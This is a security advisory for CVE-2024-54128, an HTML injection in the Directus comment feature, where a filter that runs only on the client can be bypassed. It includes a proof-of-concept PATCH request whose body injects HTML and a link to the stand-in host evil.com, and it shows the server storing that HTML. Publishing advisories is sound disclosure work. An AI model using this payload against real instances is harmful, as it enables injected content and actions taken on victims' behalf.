CVE-2024-54128 – directus

Package

Manager: npm
Name: directus
Vulnerable Version: >=10.10.0 <10.13.4 || >=11.0.0-rc.1 <11.2.2

Severity

Level: Medium

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

EPSS: 0.00076 pctl0.23488

Details

Directus has an HTML Injection in Comment ### Summary The Comment feature has implemented a filter to prevent users from adding restricted characters, such as HTML tags. However, this filter operates on the client-side, which can be bypassed, making the application vulnerable to HTML Injection. ### Details The Comment feature implements a character filter on the client-side, this can be bypassed by directly sending a request to the endpoint. Example Request: ``` PATCH /activity/comment/3 HTTP/2 Host: directus.local { "comment": "<h1>TEST <p style=\"color:red\">HTML INJECTION</p> <a href=\"//evil.com\">Test Link</a></h1>" } ``` Example Response: ```json { "data": { "id": 3, "action": "comment", "user": "288fdccc-399a-40a1-ac63-811bf62e6a18", "timestamp": "2023-09-06T02:23:40.740Z", "ip": "10.42.0.1", "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36", "collection": "directus_files", "item": "7247dda1-c386-4e7a-8121-7e9c1a42c15a", "comment": "<h1>TEST <p style=\"color:red\">HTML INJECTION</p> <a href=\"//evil.com\">Test Link</a></h1>", "origin": "https://directus.local", "revisions": [] } } ``` Example Result:  ## Impact With the introduction of session cookies this issue has become exploitable as a malicious script is now able to do authenticated actions on the current users behalf.

Metadata

Created: 2024-12-05T22:37:32Z
Modified: 2024-12-05T22:37:33Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-r6wx-627v-gh2f/GHSA-r6wx-627v-gh2f.json
CWE IDs: ["CWE-80"]
Alternative ID: GHSA-r6wx-627v-gh2f
Finding: F063
Auto approve: 1